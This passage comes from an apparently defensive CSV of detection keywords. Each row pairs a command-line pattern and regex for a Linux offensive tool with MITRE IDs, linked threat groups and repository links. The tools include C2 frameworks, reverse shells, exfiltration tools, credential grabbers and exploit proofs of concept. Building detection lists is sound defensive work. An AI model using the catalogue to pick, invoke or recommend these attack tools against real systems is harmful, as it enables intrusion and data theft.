T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/manjusaka","1","1","#linux","N/A","10","10","818","150","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z","4166" "*./Microsploit*",".{0,1000}\.\/Microsploit.{0,1000}","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . 
Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/Microsploit","1","1","#linux","N/A","N/A","5","439","121","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z","4167" "*./monkey.sh*",".{0,1000}\.\/monkey\.sh.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","#linux","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","4168" "*./msfinstall*",".{0,1000}\.\/msfinstall.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","https://x.com/mthcht/status/1827714529687658796","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","4169" "*./mythic-cli *",".{0,1000}\.\/mythic\-cli\s.{0,1000}","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1059 - T1105 - T1219 - T1573 - T1071","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/MythicAgents/tetanus","1","0","#linux","N/A","N/A","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","4170" "*./Ninja.py*",".{0,1000}\.\/Ninja\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","#linux","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","4172" "*./nps install *",".{0,1000}\.\/nps\sinstall\s.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#linux","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","4174" "*./ntdissector*",".{0,1000}\.\/ntdissector.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","#linux","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","4175" "*./nysm/src/",".{0,1000}\.\/nysm\/src\/","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1057 - T1570","TA0005 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/eeriedusk/nysm","1","0","#linux","N/A","10","3","246","39","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z","4176" "*./Obfuscated_*.py*",".{0,1000}\.\/Obfuscated_.{0,1000}\.py.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#linux","N/A","10","","N/A","","","","4177" "*./obfuscator -i *.ps1*",".{0,1000}\.\/obfuscator\s\-i\s.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","psobf","PowerShell Obfuscator","T1027 - T1059 - T1564","TA0005","N/A","N/A","Defense Evasion","https://github.com/TaurusOmar/psobf","1","0","#linux","N/A","6","2","171","30","2024-06-07T02:50:43Z","2024-06-07T01:45:12Z","4178" "*./pachine.py*",".{0,1000}\.\/pachine\.py.{0,1000}","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","Black Basta","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","#linux","N/A","8","3","275","37","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z","4179" "*./Passdetective*",".{0,1000}\.\/Passdetective.{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential 
Access","https://github.com/aydinnyunus/PassDetective","1","0","#linux","N/A","7","2","129","8","2024-06-19T10:39:39Z","2023-07-22T12:31:57Z","4180" "*./Pcredz *",".{0,1000}\.\/Pcredz\s.{0,1000}","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","#linux","N/A","N/A","10","2100","413","2025-01-27T10:34:00Z","2014-04-07T02:03:33Z","4181" "*./peass.rb*",".{0,1000}\.\/peass\.rb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#linux","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","4182" "*./PEzor.sh*",".{0,1000}\.\/PEzor\.sh.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","4183" "*./Phishing.sh*",".{0,1000}\.\/Phishing\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","#linux","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","4184" "*./pwndrop *",".{0,1000}\.\/pwndrop\s.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers 
allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","#linux","N/A","10","10","2124","267","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z","4185" "*./PyShell *",".{0,1000}\.\/PyShell\s.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/JoelGMSec/PyShell","1","0","#linux","N/A","N/A","4","309","60","2024-09-27T11:11:56Z","2021-10-19T07:49:17Z","4186" "*./recv -d :50001*",".{0,1000}\.\/recv\s\-d\s\:50001.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","Black Basta","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","#linux","N/A","10","2","138","15","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z","4187" "*./RedGuard*",".{0,1000}\.\/RedGuard.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - 
T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","#linux","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","4188" "*./redirector.py *",".{0,1000}\.\/redirector\.py\s.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","0","#linux","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","4189" "*./reverse-ssh*",".{0,1000}\.\/reverse\-ssh.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#linux","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","4190" "*./rotateproxy*",".{0,1000}\.\/rotateproxy.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/akkuman/rotateproxy","1","0","#linux","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","4191" "*./rpcrt.py*",".{0,1000}\.\/rpcrt\.py.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/yuanLink/CVE-2022-26809","1","1","#linux","N/A","N/A","1","61","27","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z","4192" "*./rsockstun*",".{0,1000}\.\/rsockstun.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","COZY BEAR","C2","https://github.com/llkat/rsockstun","1","0","#linux","N/A","10","10","53","22","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z","4193" "*./rsocx -*",".{0,1000}\.\/rsocx\s\-.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","0","#linux","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","4194" "*./rwf.py*",".{0,1000}\.\/rwf\.py.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","#linux","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","4196" "*./scan4all *",".{0,1000}\.\/scan4all\s.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","#linux","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","4197" "*./scan4all*",".{0,1000}\.\/scan4all.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","#linux","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","4198" "*./ScareCrow *",".{0,1000}\.\/ScareCrow\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - 
menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","#linux","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","4199" "*./ScareCrow -*",".{0,1000}\.\/ScareCrow\s\-.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","#linux","N/A","N/A","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","4200" "*./ScareCrow*",".{0,1000}\.\/ScareCrow.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","#linux","N/A","N/A","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","4201" "*./send -d *:123 -f *",".{0,1000}\.\/send\s\-d\s.{0,1000}\:123\s\-f\s.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","Black Basta","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","#linux","N/A","10","2","138","15","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z","4202" "*./seth.sh * *",".{0,1000}\.\/seth\.sh\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","#linux","N/A","9","10","1423","323","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z","4203" "*./ShellPwnsh*",".{0,1000}\.\/ShellPwnsh.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell 
Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","0","#linux","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","4204" "*./slip.py *",".{0,1000}\.\/slip\.py\s.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","0","#linux","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","4205" "*./sliver-client_linux*",".{0,1000}\.\/sliver\-client_linux.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","4206" "*./snaffler_downloads*",".{0,1000}\.\/snaffler_downloads.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. 
Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","#linux","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","4207" "*./snake",".{0,1000}\.\/snake","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","#linux","N/A","7","8","752","109","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z","4208" "*./SourcePoint *",".{0,1000}\.\/SourcePoint\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - 
NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","0","#linux","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","4209" "*./sshimpanzee*",".{0,1000}\.\/sshimpanzee.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","0","#linux","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","4210" "*./sudomy*",".{0,1000}\.\/sudomy.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","#linux","N/A","N/A","10","2139","396","2024-06-27T10:07:42Z","2019-07-26T10:26:34Z","4212" "*./t14m4t *",".{0,1000}\.\/t14m4t\s.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","0","#linux","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","4213" "*./teamserver *",".{0,1000}\.\/teamserver\s.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. 
recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/r00t0v3rr1d3/armitage","1","0","#linux","N/A","N/A","2","129","32","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z","4214" "*./teamserver *",".{0,1000}\.\/teamserver\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4215" "*./update-beef*",".{0,1000}\.\/update\-beef.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","0","#linux","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","4218" "*./Vegile*",".{0,1000}\.\/Vegile.{0,1000}","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/Vegile","1","1","#linux","N/A","N/A","8","726","164","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z","4219" "*./vulmap/*",".{0,1000}\.\/vulmap\/.{0,1000}","offensive_tool_keyword","Vulmap","Vulmap is an open-source online local vulnerability scanner project. It consists of online local vulnerability scanning programs for Windows and Linux operating systems. These scripts can be used for defensive and offensive purposes. It is possible to make vulnerability assessments using these scripts. Also. 
they can be used for privilege escalation by pentesters/red teamers.","T1210.001 - T1190 - T1059 - T1213","TA0007 - TA0002 - TA0008 - TA0011","N/A","N/A","Vulnerability Scanner","https://github.com/vulmon/Vulmap","1","0","N/A","N/A","10","10","965","194","2023-03-18T23:56:41Z","2018-09-07T15:49:36Z","4220" "*./xhydra*",".{0,1000}\.\/xhydra.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","4222" "*./xrkRce *",".{0,1000}\.\/xrkRce\s.{0,1000}","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Mr-xn/sunlogin_rce","1","0","#linux","N/A","N/A","5","484","195","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z","4223" "*./zabbix.py*",".{0,1000}\.\/zabbix\.py.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/pykiller/CVE-2022-23131","1","1","#linux","N/A","N/A","1","2","0","2022-02-24T11:59:48Z","2022-02-24T11:34:27Z","4224" "*./zexp check -*",".{0,1000}\.\/zexp\scheck\s\-.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation 
